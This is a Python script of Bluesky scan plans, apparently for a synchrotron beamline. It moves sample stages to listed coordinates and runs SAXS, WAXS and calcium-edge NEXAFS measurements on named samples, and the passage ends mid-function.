| 0
| 0
|
0
| 7
|
8ad605aaaa3823b11f91aa3022cf183779028003
| 31,590
|
py
|
Python
|
startup/users/30-user-Gomez_Oskar.py
|
NSLS-II-SMI/profile_collection
|
c1e2236a7520f605ac85e7591f05682add06357c
|
[
"BSD-3-Clause"
] | null | null | null |
startup/users/30-user-Gomez_Oskar.py
|
NSLS-II-SMI/profile_collection
|
c1e2236a7520f605ac85e7591f05682add06357c
|
[
"BSD-3-Clause"
] | 13
|
2018-09-25T19:35:08.000Z
|
2021-01-15T20:42:26.000Z
|
startup/users/30-user-Gomez_Oskar.py
|
NSLS-II-SMI/profile_collection
|
c1e2236a7520f605ac85e7591f05682add06357c
|
[
"BSD-3-Clause"
] | 3
|
2019-09-06T01:40:59.000Z
|
2020-07-01T20:27:39.000Z
|
def ex_situ_hardxray(t=1):
# samples = ['PLA2','PLA1','CON6','CON5', 'CON4','CON3','CON2','CON1',
# '05_Ca_1', '05_Ca_2', '05_UT_1', '05_UT_2', 'PLA6','PLA4','PLA3',
# ]
# samples = ['B5_1','B5_2','B5_3', 'B6_1','B6_2','B6_3','B7_1','B7_2','B7_3','B12_1','B12_2','B12_3']
# x_list = [45550, 41200, 35600, 25600, 20900, 15400, -1900, -7900, -14000, -24100, -28200, -32700, ]
# y_list = [-9300, -9300, -9300, -9300, -9300, -9300, -9300, -9300, -9300, -9300, -9300, -9300]
# samples = ['A1_1','A1_2','A1_3', 'A1_4','A2_5','A2_6','A2_7','A2_8','A3_9','A3_10','A3_11','A3_12','A3_13','A3_14','A4_15', 'A4_16', 'A4_17', 'A4_19']
# x_list = [45950, 43250, 37250, 31650, 24400, 18850, 12500, 8000, -3400, -7300, -11300, -16800, -20900, -26400, -33000, -37400, -41900, -45200]
# y_list = [3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500, 3500]
# samples = ['C8_32', 'C8_33', 'C8_34', 'C8_35', 'C9_36', 'C9_37', 'C9_38', 'C9_39', 'C10_40', 'C10_41', 'C10_42', 'C10_43',
# 'C10_44', 'C10_45', 'C11_46', 'C11_47', 'C11_48', 'C11_49', 'C11_50']
# x_list = [43700, 38300, 34000, 27800, 20900, 16200, 12100, 7100, -2700, -6700, -10500, -15700, -20000,
# -24200, -29300, -32700, -36700, -41000, -45000]
# y_list = [3700, 3700, 3700, 3700, 3700, 3700, 3700, 3700, 3700, 3700, 3700, 3700, 3700,
# 3700, 3700, 3700, 3700, 3700, 3700]
samples = ['D13_51','D13_52','D13_53','D14_54','D14_55','D14_56','D15_57','D15_58','D15_59','D16_60','D16_61','D16_62','D16_63','D16_64',
'D17_65','D17_66','D17_67']
x_list = [43700, 38400, 34000, 25200, 20000, 15400, 6700, 2500, -2300, -6800, -14000, -19000, -23300, -28500,
-34700, -39300, -43600]
y_list = [-9880, -9880, -9880, -9880, -9880, -9880, -9880, -9880, -9880, -9880, -9880, -9880, -9880, -9880,
-9880, -9880, -9880]
# Detectors, motors:
dets = [pil1M, pil300KW]
waxs_range = np.linspace(13, 0, 3)
ypos = [0, 400, 3]
assert len(x_list) == len(samples), f'Number of X coordinates ({len(x_list)}) is different from number of samples ({len(samples)})'
assert len(x_list) == len(y_list), f'Number of X coordinates ({len(x_list)}) is different from number of Y coord ({len(y_list)})'
det_exposure_time(t,t)
for wa in waxs_range:
yield from bps.mv(waxs, wa)
for sam, x, y in zip(samples, x_list, y_list):
yield from bps.mv(piezo.x, x)
yield from bps.mv(piezo.y, y)
name_fmt = '{sam}_wa{waxs}'
sample_name = name_fmt.format(sam=sam, waxs='%2.1f'%wa)
sample_id(user_name='OS', sample_name=sample_name)
yield from bp.rel_scan(dets, piezo.y, *ypos)
sample_id(user_name='test', sample_name='test')
det_exposure_time(0.3,0.3)
def ex_situ_hardxray_2020_3(t=1):
yield from bps.mv(stage.y, 0)
yield from bps.mv(stage.th, 0)
samples = ['F22_83','F22_84','F22_85','F23_86','F23_87','F23_88','F24_89','F24_90','F24_91','F24_92','F24_93','F24_94','F25_95','F25_96','F25_97','F25_98']
x_list = [45100, 38750, 33500, 26450, 21600, 17300, 7800, 3600, -2300, -7800, -13400, -18500, -28800, -32400, -36700, -42500]
y_list = [-1500, -1500, -1500, -1500, -1500, -1500, -1500, -1500, -1500, -1500, -1500, -1500, -1500, -1500, -1500, -1500]
z_list = [ 2700, 2700, 2700, 2700, 2700, 2700, 2700, 2700, 2700, 2700, 2700, 2700, 2700, 2700, 2700, 2700]
# Detectors, motors:
dets = [pil1M, pil300KW]
waxs_range = np.linspace(0, 32.5, 6)
ypos = [0, 400, 3]
assert len(x_list) == len(samples), f'Number of X coordinates ({len(x_list)}) is different from number of samples ({len(samples)})'
assert len(x_list) == len(y_list), f'Number of X coordinates ({len(x_list)}) is different from number of Y coord ({len(y_list)})'
det_exposure_time(t,t)
for wa in waxs_range:
yield from bps.mv(waxs, wa)
for sam, x, y, z in zip(samples, x_list, y_list, z_list):
yield from bps.mv(piezo.x, x)
yield from bps.mv(piezo.y, y)
yield from bps.mv(piezo.z, z)
name_fmt = '{sam}_wa{waxs}'
sample_name = name_fmt.format(sam=sam, waxs='%2.1f'%wa)
sample_id(user_name='OS', sample_name=sample_name)
yield from bp.rel_scan(dets, piezo.y, *ypos)
sample_id(user_name='test', sample_name='test')
# det_exposure_time(0.3,0.3)
yield from bps.mv(stage.th, 1.5)
yield from bps.mv(stage.y, -11)
samples = ['E18_67','E18_68','E18_69','E19_70','E19_71','E19_72','E19_73','E19_74','E19_75','E20_76','E20_77','E20_78','E21_79','E21_80','E21_81','E22_82']
x_list = [43500, 37500, 32100, 23600, 18350, 13000, 7200, 3300, -450, -9400, -14300, -19400, -25900, -31300, -36200, -43200]
y_list = [-9700, -9700, -9700, -9700, -9700, -9700, -9700, -9700, -9700, -9700, -9700, -9700, -9700, -9700, -9700, -9700]
z_list = [ 4200, 4200, 4200, 4200, 4200, 4200, 4200, 4200, 4200, 4200, 4200, 4200, 4200, 4200, 4200, 4200]
# Detectors, motors:
dets = [pil1M, pil300KW]
waxs_range = np.linspace(0, 32.5, 6)
ypos = [0, 400, 3]
assert len(x_list) == len(samples), f'Number of X coordinates ({len(x_list)}) is different from number of samples ({len(samples)})'
assert len(x_list) == len(y_list), f'Number of X coordinates ({len(x_list)}) is different from number of Y coord ({len(y_list)})'
det_exposure_time(t,t)
for wa in waxs_range:
yield from bps.mv(waxs, wa)
for sam, x, y, z in zip(samples, x_list, y_list, z_list):
yield from bps.mv(piezo.x, x)
yield from bps.mv(piezo.y, y)
yield from bps.mv(piezo.z, z)
name_fmt = '{sam}_16.1keV_wa{waxs}'
sample_name = name_fmt.format(sam=sam, waxs='%2.1f'%wa)
sample_id(user_name='OS', sample_name=sample_name)
yield from bp.rel_scan(dets, piezo.y, *ypos)
sample_id(user_name='test', sample_name='test')
det_exposure_time(0.3,0.3)
# def ex_situ_hardxray_2021_1(t=1):
# yield from bps.mv(stage.y, 0)
# yield from bps.mv(stage.th, 0)
# samples = ['F22_83','F22_84','F22_85','F23_86','F23_87','F23_88','F24_89','F24_90','F24_91','F24_92','F24_93','F24_94','F25_95','F25_96','F25_97','F25_98']
# x_list = [45100, 38750, 33500, 26450, 21600, 17300, 7800, 3600, -2300, -7800, -13400, -18500, -28800, -32400, -36700, -42500]
# y_list = [-1500, -1500, -1500, -1500, -1500, -1500, -1500, -1500, -1500, -1500, -1500, -1500, -1500, -1500, -1500, -1500]
# z_list = [ 2700, 2700, 2700, 2700, 2700, 2700, 2700, 2700, 2700, 2700, 2700, 2700, 2700, 2700, 2700, 2700]
# # Detectors, motors:
# dets = [pil1M, pil300KW]
# waxs_range = np.linspace(0, 32.5, 6)
# ypos = [0, 400, 3]
# assert len(x_list) == len(samples), f'Number of X coordinates ({len(x_list)}) is different from number of samples ({len(samples)})'
# assert len(x_list) == len(y_list), f'Number of X coordinates ({len(x_list)}) is different from number of Y coord ({len(y_list)})'
# det_exposure_time(t,t)
# for wa in waxs_range:
# yield from bps.mv(waxs, wa)
# for sam, x, y, z in zip(samples, x_list, y_list, z_list):
# yield from bps.mv(piezo.x, x)
# yield from bps.mv(piezo.y, y)
# yield from bps.mv(piezo.z, z)
# name_fmt = '{sam}_wa{waxs}'
# sample_name = name_fmt.format(sam=sam, waxs='%2.1f'%wa)
# sample_id(user_name='OS', sample_name=sample_name)
# yield from bp.rel_scan(dets, piezo.y, *ypos)
# sample_id(user_name='test', sample_name='test')
# # det_exposure_time(0.3,0.3)
# yield from bps.mv(stage.th, 1.5)
# yield from bps.mv(stage.y, -11)
# samples = ['E18_67','E18_68','E18_69','E19_70','E19_71','E19_72','E19_73','E19_74','E19_75','E20_76','E20_77','E20_78','E21_79','E21_80','E21_81','E22_82']
# x_list = [43500, 37500, 32100, 23600, 18350, 13000, 7200, 3300, -450, -9400, -14300, -19400, -25900, -31300, -36200, -43200]
# y_list = [-9700, -9700, -9700, -9700, -9700, -9700, -9700, -9700, -9700, -9700, -9700, -9700, -9700, -9700, -9700, -9700]
# z_list = [ 4200, 4200, 4200, 4200, 4200, 4200, 4200, 4200, 4200, 4200, 4200, 4200, 4200, 4200, 4200, 4200]
# # Detectors, motors:
# dets = [pil1M, pil300KW]
# waxs_range = np.linspace(0, 32.5, 6)
# ypos = [0, 400, 3]
# assert len(x_list) == len(samples), f'Number of X coordinates ({len(x_list)}) is different from number of samples ({len(samples)})'
# assert len(x_list) == len(y_list), f'Number of X coordinates ({len(x_list)}) is different from number of Y coord ({len(y_list)})'
# det_exposure_time(t,t)
# for wa in waxs_range:
# yield from bps.mv(waxs, wa)
# for sam, x, y, z in zip(samples, x_list, y_list, z_list):
# yield from bps.mv(piezo.x, x)
# yield from bps.mv(piezo.y, y)
# yield from bps.mv(piezo.z, z)
# name_fmt = '{sam}_16.1keV_wa{waxs}'
# sample_name = name_fmt.format(sam=sam, waxs='%2.1f'%wa)
# sample_id(user_name='OS', sample_name=sample_name)
# yield from bp.rel_scan(dets, piezo.y, *ypos)
# sample_id(user_name='test', sample_name='test')
det_exposure_time(0.3,0.3)
def ex_situ_hardxray_2021_1(t=1):
yield from bps.mv(stage.th, 0)
yield from bps.mv(stage.y, 0)
# samples = ['P1_1', 'P1_2', 'P1_3', 'P2_1', 'P2_2', 'P2_3', 'P3_1', 'P3_2', 'P3_3', 'P4_1', 'P4_2', 'P4_3', 'P5_1', 'P5_2', 'P5_3',
# 'P6_1', 'P6_2', 'P6_3', 'P7_1', 'P7_2', 'P7_3', 'P8_1', 'P8_2', 'P8_3']
# x_list = [ 45400, 41100, 37500, 32400, 29400, 25900, 20200, 16700, 13100, 6800, 3700, 200, -4600, -8400, -12000, -17200, -20600,
# -24000, -29400, -33100, -36200, -40000, -42500, -45500]
# y_list = [ -3000, -3000, -3000, -3000, -3000, -3000, -3000, -3000, -3000, -3000, -3000, -3000, -3000, -3000, -3000, -3000, -3000,
# -3000, -3000, -3000, -3000, -3000, -3000, -3000]
# z_list = [ 4000, 4000, 4100, 4100, 4200, 4200, 4200, 4200, 4300, 4300, 4400, 4400, 4500, 4500, 4600, 4600, 4700,
# 4700, 4800, 4800, 4900, 4900, 5000, 5000]
samples = ['N1_1', 'N1_2', 'N1_3', 'N1_4', 'N2_1', 'N2_2', 'N2_3', 'N2_4', 'N3_1', 'N3_2', 'N3_3', 'N4_1', 'N4_2', 'N4_3', 'N5_1',
'N5_2', 'N5_3']
x_list = [ 45300, 41400, 38200, 34700, 29600, 26300, 22900, 18400, 7700, 3100, -1300, -9300, -14200, -19600, -28600, -35100, -41200]
y_list = [ -2500, -2500, -2500, -2500, -2500, -2500, -2500, -2500, -2500, -2500, -2500, -2500, -2500, -2500, -2500, -2500, -2500]
z_list = [ 4500, 4500, 4500, 4500, 4500, 4500, 4500, 4500, 4500, 4500, 4500, 4500, 4500, 4500, 4500, 4500, 4500]
# Detectors, motors:
dets = [pil1M, pil300KW]
waxs_range = np.linspace(0, 32.5, 6)
ypos = [0, 400, 3]
assert len(x_list) == len(samples), f'Number of X coordinates ({len(x_list)}) is different from number of samples ({len(samples)})'
assert len(x_list) == len(y_list), f'Number of X coordinates ({len(x_list)}) is different from number of Y coord ({len(y_list)})'
det_exposure_time(t,t)
for wa in waxs_range:
yield from bps.mv(waxs, wa)
for sam, x, y, z in zip(samples, x_list, y_list, z_list):
yield from bps.mv(piezo.x, x)
yield from bps.mv(piezo.y, y)
yield from bps.mv(piezo.z, z)
name_fmt = '{sam}_wa{waxs}_sdd8.3m_16.1keV'
sample_name = name_fmt.format(sam=sam, waxs='%2.1f'%wa)
sample_id(user_name='OS', sample_name=sample_name)
yield from bp.rel_scan(dets, piezo.y, *ypos)
sample_id(user_name='test', sample_name='test')
det_exposure_time(0.3,0.3)
# yield from bps.mv(stage.th, 2.5)
# yield from bps.mv(stage.y, -13)
# samples = ['R1_1', 'R1_2', 'R1_3', 'R2_1', 'R2_2', 'R2_3', 'R3_1', 'R3_2', 'R3_3', 'R4_1', 'R4_2', 'R4_3', 'R5_1', 'R5_2', 'R5_3']
# x_list = [ 44800, 40300, 34800, 24800, 18800, 12300, 4000, -1700, -7800, -13700, -20700, -27700, -33200, -38200, -43400]
# y_list = [ -9500, -9500, -9500, -9500, -9500, -9500, -9500, -9500, -9500, -9500, -9500, -9500, -9500, -9500, -9500]
# z_list = [ 3000, 3000, 3000, 3000, 3000, 3000, 3000, 3000, 3000, 3000, 3000, 3000, 3000, 3000, 3000]
# for wa in waxs_range:
# yield from bps.mv(waxs, wa)
# for sam, x, y, z in zip(samples, x_list, y_list, z_list):
# yield from bps.mv(piezo.x, x)
# yield from bps.mv(piezo.y, y)
# yield from bps.mv(piezo.z, z)
# name_fmt = '{sam}_wa{waxs}_sdd8.3m_16.1keV'
# sample_name = name_fmt.format(sam=sam, waxs='%2.1f'%wa)
# sample_id(user_name='OS', sample_name=sample_name)
# yield from bp.rel_scan(dets, piezo.y, *ypos)
# sample_id(user_name='test', sample_name='test')
# det_exposure_time(0.3,0.3)
def run_saxs_nexafs(t=1):
yield from waxs_prep_multisample_nov(t=0.5)
# yield from bps.sleep(10)
# yield from nexafs_prep_multisample_nov(t=1)
def saxs_prep_multisample_nov(t=1):
dets = [pil1M]
energies = [4030, 4040, 4050, 4055, 4065, 4075, 4105]
det_exposure_time(t,t)
name_fmt = '{sample}_{energy}eV_pos{posi}_wa{wa}_xbpm{xbpm}'
waxs_range = [32.5]
ypos = [0, 400, 3]
for wa in waxs_range:
yield from bps.mv(waxs, wa)
yield from bps.mv(stage.th, 3.5)
yield from bps.mv(stage.y, -13)
# samples = ['K5-6', 'K5-5', 'K5-4', 'K5-3', 'K5-2', 'K5-1', 'K4-3', 'K4-2', 'K4-1', 'K3-3', 'K3-2', 'K3-1', 'K2-3', 'K2-2', 'K2-1', 'K1-3', 'K1-2', 'K1-1']
# x_list = [41400, 37700,34300,26750,23800,20600,1700,-2100,-5300,-10200,-14150,-19200,-27500,-32000,-37500,-41100,-45800,-49400]
# y_list = [-9500, -9500,-9500,-9500,-9500,-9500,-9500,-9500,-9500,-9500, -9500, -9500, -9500, -9500, -9500, -9500, -9700, -9500]
# z_list = [ 5500, 5500, 5400, 5300, 5200, 5100, 5000, 4900, 4800, 4700, 4600, 4500, 4400, 4300, 4200, 4100, 4000, 3900]
# samples = ['M14-1', 'M14-2', 'M14-3', 'M15-1', 'M15-2', 'M15-3', 'M16-1', 'M16-2', 'M16-3', 'M17-1', 'M17-2', 'M17-3', 'M18-1', 'M18-2', 'M18-3', 'M18-4', 'M18-5']
# x_list = [ 46900, 44500, 41500, 31900, 27300, 22750, 12750, 10500, 7800, -2800, -4900, -9100, -17400, -20800, -23800, -26550, -29950]
# y_list = [ -8500, -8500, -8500, -8500, -8500, -8500, -8500, -8500, -8500, -8100, -8500, -8500, -8500, -8500, -8500, -8500, -8500]
# z_list = [ 4800, 4800, 4700, 4600, 4500, 4500, 4400, 4300, 4200, 4100, 4100, 4000, 3900, 3800, 3800, 3700, 3600]
samples = [ 'M16-2', 'M16-3', 'M17-1', 'M17-2', 'M17-3', 'M18-1', 'M18-2', 'M18-3', 'M18-4', 'M18-5']
x_list = [ 10500, 7800, -2800, -4900, -9100, -17400, -20800, -23800, -26550, -29950]
y_list = [ -8500, -8500, -8100, -8500, -8500, -8500, -8500, -8500, -8500, -8500]
z_list = [ 4300, 4200, 4100, 4100, 4000, 3900, 3800, 3800, 3700, 3600]
for x, y, z, name in zip(x_list, y_list, z_list, samples):
yield from bps.mv(piezo.x, x)
yield from bps.mv(piezo.y, y)
yield from bps.mv(piezo.z, z)
for k, e in enumerate(energies):
yield from bps.mv(energy, e)
yield from bps.sleep(3)
name_fmt = '{sample}_{energy}eV_5m_xbpm{xbpm}_wa{wa}'
sample_name = name_fmt.format(sample=name, energy=e, xbpm = '%3.1f'%xbpm3.sumY.value, wa='%2.1f'%wa)
sample_id(user_name='OS', sample_name=sample_name)
print(f'\n\t=== Sample: {sample_name} ===\n')
yield from bp.rel_scan(dets, piezo.y, *ypos)
yield from bps.mv(energy, 4080)
yield from bps.mv(energy, 4055)
yield from bps.mv(energy, 4030)
# for wa in waxs_range:
# yield from bps.mv(waxs, wa)
# yield from bps.mv(stage.y, 0)
# yield from bps.mv(stage.th, 0)
# samples = ['L13-3', 'L13-2', 'L13-1', 'L12-3', 'L12-2', 'L12-1', 'L11-3', 'L11-2', 'L11-1', 'L10-3', 'L10-2', 'L10-1', 'L9-3', 'L9-2', 'L9-1', 'L8-3', 'L8-2',
# 'L8-1', 'L7-3', 'L7-2', 'L7-1', 'L6-3', 'L6-2', 'L6-1']
# x_list = [40600, 37500, 34500, 29400, 25600, 22300, 17100, 14250, 10800, 5900, 3450, 550, -5050, -7250, -9100, -13900,-16200,-18500,-22300,-24700,-27050,
# -34800, -38450, -42250]
# y_list = [-1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000,
# -1000, -1000, -1000]
# z_list = [ 5400, 5400, 5300, 5200, 5100, 5000, 4900, 4800, 4700, 4600, 4500, 4400, 4300, 4200, 4100, 4000, 3900, 3800, 3700, 3600, 3500,
# 3300, 3400, 3300]
# assert len(x_list) == len(samples), f'Number of X coordinates ({len(x_list)}) is different from number of samples ({len(samples)})'
# assert len(x_list) == len(y_list), f'Number of X coordinates ({len(x_list)}) is different from number of Y coord ({len(y_list)})'
# assert len(x_list) == len(z_list), f'Number of X coordinates ({len(x_list)}) is different from number of z coord ({len(z_list)})'
# for x, y, z, name in zip(x_list, y_list, z_list, samples):
# yield from bps.mv(piezo.x, x)
# yield from bps.mv(piezo.y, y)
# yield from bps.mv(piezo.z, z)
# for k, e in enumerate(energies):
# yield from bps.mv(energy, e)
# yield from bps.sleep(3)
# name_fmt = '{sample}_{energy}eV_xbpm{xbpm}_wa{wa}'
# sample_name = name_fmt.format(sample=name, energy=e, xbpm = '%3.1f'%xbpm3.sumY.value, wa='%2.1f'%wa)
# sample_id(user_name='OS', sample_name=sample_name)
# print(f'\n\t=== Sample: {sample_name} ===\n')
# yield from bp.rel_scan(dets, piezo.y, *ypos)
# yield from bps.mv(energy, 4080)
# yield from bps.mv(energy, 4055)
# yield from bps.mv(energy, 4030)
sample_id(user_name='test', sample_name='test')
det_exposure_time(0.3,0.3)
def waxs_prep_multisample_nov(t=1):
dets = [pil300KW]
energies = [4030, 4040, 4050, 4055, 4065, 4075, 4105]
det_exposure_time(t,t)
name_fmt = '{sample}_{energy}eV_pos{posi}_wa{wa}_xbpm{xbpm}'
waxs_range = [0, 6.5, 13.0, 19.5, 26, 32.5, 39.0, 45.5]
ypos = [0, 400, 3]
# for wa in waxs_range:
# yield from bps.mv(waxs, wa)
# yield from bps.mv(stage.th, 3.5)
# yield from bps.mv(stage.y, -13)
# # samples = ['K5-6', 'K5-5', 'K5-4', 'K5-3', 'K5-2', 'K5-1', 'K4-3', 'K4-2', 'K4-1', 'K3-3', 'K3-2', 'K3-1', 'K2-3', 'K2-2', 'K2-1', 'K1-3', 'K1-2', 'K1-1']
# # x_list = [41400, 37700,34300,26750,23800,20600,1700,-2100,-5300,-10200,-14150,-19200,-27500,-32000,-37500,-41100,-45800,-49400]
# # y_list = [-9500, -9500,-9500,-9500,-9500,-9500,-9500,-9500,-9500,-9500, -9500, -9500, -9500, -9500, -9500, -9500, -9700, -9500]
# # z_list = [ 5500, 5500, 5400, 5300, 5200, 5100, 5000, 4900, 4800, 4700, 4600, 4500, 4400, 4300, 4200, 4100, 4000, 3900]
# samples = ['M14-1', 'M14-2', 'M14-3', 'M15-1', 'M15-2', 'M15-3', 'M16-1', 'M16-2', 'M16-3', 'M17-1', 'M17-2', 'M17-3', 'M18-1', 'M18-2', 'M18-3', 'M18-4', 'M18-5']
# x_list = [ 46900, 44500, 41500, 31900, 27300, 22750, 12750, 10500, 7800, -2800, -4900, -9100, -17400, -20800, -23800, -26550, -29950]
# y_list = [ -8500, -8500, -8500, -8500, -8500, -8500, -8500, -8500, -8500, -8100, -8500, -8500, -8500, -8500, -8500, -8500, -8500]
# z_list = [ 4800, 4800, 4700, 4600, 4500, 4500, 4400, 4300, 4200, 4100, 4100, 4000, 3900, 3800, 3800, 3700, 3600]
# for x, y, z, name in zip(x_list, y_list, z_list, samples):
# yield from bps.mv(piezo.x, x)
# yield from bps.mv(piezo.y, y)
# yield from bps.mv(piezo.z, z)
# for k, e in enumerate(energies):
# yield from bps.mv(energy, e)
# yield from bps.sleep(3)
# name_fmt = '{sample}_{energy}eV_xbpm{xbpm}_wa{wa}'
# sample_name = name_fmt.format(sample=name, energy=e, xbpm = '%3.1f'%xbpm3.sumY.value, wa='%2.1f'%wa)
# sample_id(user_name='OS', sample_name=sample_name)
# print(f'\n\t=== Sample: {sample_name} ===\n')
# yield from bp.rel_scan(dets, piezo.y, *ypos)
# yield from bps.mv(energy, 4080)
# yield from bps.mv(energy, 4055)
# yield from bps.mv(energy, 4030)
# energies = [4030, 4040, 4050, 4055, 4065, 4075, 4105]
# waxs_range = [0, 6.5, 13.0, 19.5, 26, 32.5, 39.0, 45.5]
# for wa in waxs_range:
# yield from bps.mv(waxs, wa)
# yield from bps.mv(stage.y, 0)
# yield from bps.mv(stage.th, 0)
# # samples = ['L13-3', 'L13-2', 'L13-1', 'L12-3', 'L12-2', 'L12-1', 'L11-3', 'L11-2', 'L11-1', 'L10-3', 'L10-2', 'L10-1', 'L9-3', 'L9-2', 'L9-1', 'L8-3', 'L8-2',
# # 'L8-1', 'L7-3', 'L7-2', 'L7-1', 'L6-3', 'L6-2', 'L6-1']
# # x_list = [40600, 37500, 34500, 29400, 25600, 22300, 17100, 14250, 10800, 5900, 3450, 550, -5050, -7250, -9100, -13900,-16200,-18500,-22300,-24700,-27050,
# # -34800, -38450, -42250]
# # y_list = [-1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000,
# # -1000, -1000, -1000]
# # z_list = [ 5400, 5400, 5300, 5200, 5100, 5000, 4900, 4800, 4700, 4600, 4500, 4400, 4300, 4200, 4100, 4000, 3900, 3800, 3700, 3600, 3500,
# # 3300, 3400, 3300]
# samples = [ 'P1', 'P2', 'E1', 'E2', 'PG1', 'PG2']
# x_list = [11400, 6200, 200, -5200, -13200, -26200]
# y_list = [-1000, -900, -900, -700, -1300, -1300]
# z_list = [ 4500, 4300, 4200, 4100, 4000, 4000]
# assert len(x_list) == len(samples), f'Number of X coordinates ({len(x_list)}) is different from number of samples ({len(samples)})'
# assert len(x_list) == len(y_list), f'Number of X coordinates ({len(x_list)}) is different from number of Y coord ({len(y_list)})'
# assert len(x_list) == len(z_list), f'Number of X coordinates ({len(x_list)}) is different from number of z coord ({len(z_list)})'
# for x, y, z, name in zip(x_list, y_list, z_list, samples):
# yield from bps.mv(piezo.x, x)
# yield from bps.mv(piezo.y, y)
# yield from bps.mv(piezo.z, z)
# for k, e in enumerate(energies):
# yield from bps.mv(energy, e)
# yield from bps.sleep(3)
# name_fmt = '{sample}_{energy}eV_xbpm{xbpm}_wa{wa}'
# sample_name = name_fmt.format(sample=name, energy=e, xbpm = '%3.1f'%xbpm3.sumY.value, wa='%2.1f'%wa)
# sample_id(user_name='OS', sample_name=sample_name)
# print(f'\n\t=== Sample: {sample_name} ===\n')
# yield from bp.rel_scan(dets, piezo.y, *ypos)
# yield from bps.mv(energy, 4080)
# yield from bps.mv(energy, 4055)
# yield from bps.mv(energy, 4030)
energies = np.arange(4030, 4040, 5).tolist() + np.arange(4040, 4060, 0.5).tolist() + np.arange(4060, 4080, 2).tolist() + np.arange(4080, 4150, 5).tolist()
# waxs_range = [0, 6.5, 13.0, 19.5, 26, 32.5, 39.0, 45.5]
waxs_range = [6.5]
for wa in waxs_range:
yield from bps.mv(waxs, wa)
yield from bps.mv(stage.y, 0)
yield from bps.mv(stage.th, 0)
# samples = [ 'U1', 'U2', 'Ca1', 'Ca2']
# x_list = [43000, 31000, -36500, -44000]
# y_list = [ -700, -700, -900, -900]
# z_list = [ 4600, 4600, 3600, 3600]
samples = [ 'Ca2']
x_list = [ -44000]
y_list = [ -900]
z_list = [ 3600]
assert len(x_list) == len(samples), f'Number of X coordinates ({len(x_list)}) is different from number of samples ({len(samples)})'
assert len(x_list) == len(y_list), f'Number of X coordinates ({len(x_list)}) is different from number of Y coord ({len(y_list)})'
assert len(x_list) == len(z_list), f'Number of X coordinates ({len(x_list)}) is different from number of z coord ({len(z_list)})'
for x, y, z, name in zip(x_list, y_list, z_list, samples):
yield from bps.mv(piezo.x, x)
yield from bps.mv(piezo.y, y)
yield from bps.mv(piezo.z, z)
for k, e in enumerate(energies):
yield from bps.mv(energy, e)
yield from bps.sleep(3)
name_fmt = '{sample}_{energy}eV_xbpm{xbpm}_wa{wa}'
sample_name = name_fmt.format(sample=name, energy=e, xbpm = '%3.1f'%xbpm3.sumY.value, wa='%2.1f'%wa)
sample_id(user_name='OS', sample_name=sample_name)
print(f'\n\t=== Sample: {sample_name} ===\n')
yield from bp.rel_scan(dets, piezo.y, *ypos)
yield from bps.mv(energy, 4120)
yield from bps.mv(energy, 4090)
yield from bps.mv(energy, 4060)
yield from bps.mv(energy, 4030)
sample_id(user_name='test', sample_name='test')
det_exposure_time(0.3,0.3)
def nexafs_prep_multisample_nov(t=1):
# samples = ['K5-6', 'K5-5', 'K5-4', 'K5-3', 'K5-2', 'K5-1', 'K4-3', 'K4-2', 'K4-1', 'K3-3', 'K3-2', 'K3-1', 'K2-3', 'K2-2', 'K2-1', 'K1-3', 'K1-2', 'K1-1']
# x_list = [41400, 37700, 34300, 26750, 23800, 20600, 1700, -2100, -5300, -10200,-14150,-19200,-27500,-32000,-37500,-41100,-45800,-49400]
# y_list = [-9500, -9500, -9500, -9500, -9500, -9500, -9500,- 9500, -9500,-9500, -9500, -9500, -9500, -9500, -9500, -9500, -9700, -9500]
# z_list = [ 5500, 5500, 5400, 5300, 5200, 5100, 5000, 4900, 4800, 4700, 4600, 4500, 4400, 4300, 4200, 4100, 4000, 3900]
yield from bps.mv(stage.th, 3.5)
yield from bps.mv(stage.y, -13)
samples = ['M14-1', 'M14-2', 'M14-3', 'M15-1', 'M15-2', 'M15-3', 'M16-1', 'M16-2', 'M16-3', 'M17-1', 'M17-2', 'M17-3', 'M18-1', 'M18-2', 'M18-3', 'M18-4', 'M18-5']
x_list = [ 46900, 44500, 41500, 31900, 27300, 22750, 12750, 10500, 7800, -2800, -4900, -9100, -17400, -20800, -23800, -26550, -29950]
y_list = [ -8500, -8500, -8500, -8500, -8500, -8500, -8500, -8500, -8500, -8100, -8500, -8500, -8500, -8500, -8500, -8500, -8500]
z_list = [ 4800, 4800, 4700, 4600, 4500, 4500, 4400, 4300, 4200, 4100, 4100, 4000, 3900, 3800, 3800, 3700, 3600]
assert len(x_list) == len(samples), f'Number of X coordinates ({len(x_list)}) is different from number of samples ({len(samples)})'
assert len(x_list) == len(y_list), f'Number of X coordinates ({len(x_list)}) is different from number of Y coord ({len(y_list)})'
assert len(x_list) == len(z_list), f'Number of X coordinates ({len(x_list)}) is different from number of Y coord ({len(z_list)})'
for x, y, z, name in zip(x_list, y_list, z_list, samples):
yield from bps.mv(piezo.x, x)
yield from bps.mv(piezo.y, y)
yield from bps.mv(piezo.z, z)
yield from NEXAFS_Ca_edge_multi(t=t, name=name)
yield from bps.mv(stage.y, 0)
yield from bps.mv(stage.th, 0)
# samples = ['L13-3', 'L13-2', 'L13-1', 'L12-3', 'L12-2', 'L12-1', 'L11-3', 'L11-2', 'L11-1', 'L10-3', 'L10-2', 'L10-1', 'L9-3', 'L9-2', 'L9-1', 'L8-3', 'L8-2',
# 'L8-1', 'L7-3', 'L7-2', 'L7-1', 'L6-3', 'L6-2', 'L6-1']
# x_list = [40600, 37500, 34500, 29400, 25600, 22300, 17100, 14250, 10800, 5900, 3450, 550, -5050, -7250, -9100, -13900,-16200,-18500,-22300,-24700,-27050,
# -34800, -38450, -42250]
# y_list = [-1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000, -1000,
# -1000, -1000, -1000]
# z_list = [ 5400, 5400, 5300, 5200, 5100, 5000, 4900, 4800, 4700, 4600, 4500, 4400, 4300, 4200, 4100, 4000, 3900, 3800, 3700, 3600, 3500,
# 3300, 3400, 3300]
samples = [ 'C1', 'C2', 'P1', 'P2', 'E1', 'E2', 'PG1', 'PG2']
x_list = [21800, 16500, 11400, 6200, 200, -5200, -13200, -26200]
